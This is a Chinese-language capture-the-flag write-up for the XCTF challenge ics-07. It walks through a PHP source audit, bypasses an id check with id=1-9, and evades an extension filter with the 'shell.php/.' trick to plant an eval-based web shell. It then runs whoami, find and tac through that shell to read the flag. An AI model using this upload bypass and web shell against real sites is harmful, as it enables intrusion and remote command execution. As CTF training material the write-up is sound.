xctf攻防世界ics-07 wp

12 篇文章 0 订阅

xctf攻防世界ics-07 wp

在这里插入图片描述
考察知识点:php代码审计、命令执行
访问题目地址
在这里插入图片描述
随便点一点,康康能发现什么
在这里插入图片描述
发现这里有源码
在这里插入图片描述

进行php代码审计
分析:
参数page存在且其值不等于index.php,才会包含flag.php
在这里插入图片描述
将$ con的内容写入$ file中,但文件后缀名不能为.php3/4/5/6/7/t/html
在这里插入图片描述
$_SESSION[‘admin’] = True可以满足以上所需
此段需要满足参数id存在,id的浮点值不为’1’,id参数的最后一个数值是9
在这里插入图片描述
可以使用id=1-9来绕过

Payload:

http://111.200.241.244:53209/index.php?page=flag.php&id=1-9

在这里插入图片描述
可以看到源码中有
在这里插入图片描述
此时尝试使用post方式上传文件,file为文件名,con为文件内容,
正则的话是判断.之后的字符,因此可以利用/.的方式绕过,这个方式的意思是在文件名目录下在加个空目录,相当于没加,因此达到绕过正则的目的

file=shell.php/.&con=<?php @eval($_POST['pass']);?>

访问http://111.200.241.244:53209/uploaded/backup/看看是否将shell写上去

在这里插入图片描述
用POST传参pass=system('whoami');康一康
在这里插入图片描述

pass=system('find / -name *flag*');查找flag

在这里插入图片描述

pass=system('tac /var/www/html/flag.php');拿到flag

在这里插入图片描述

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值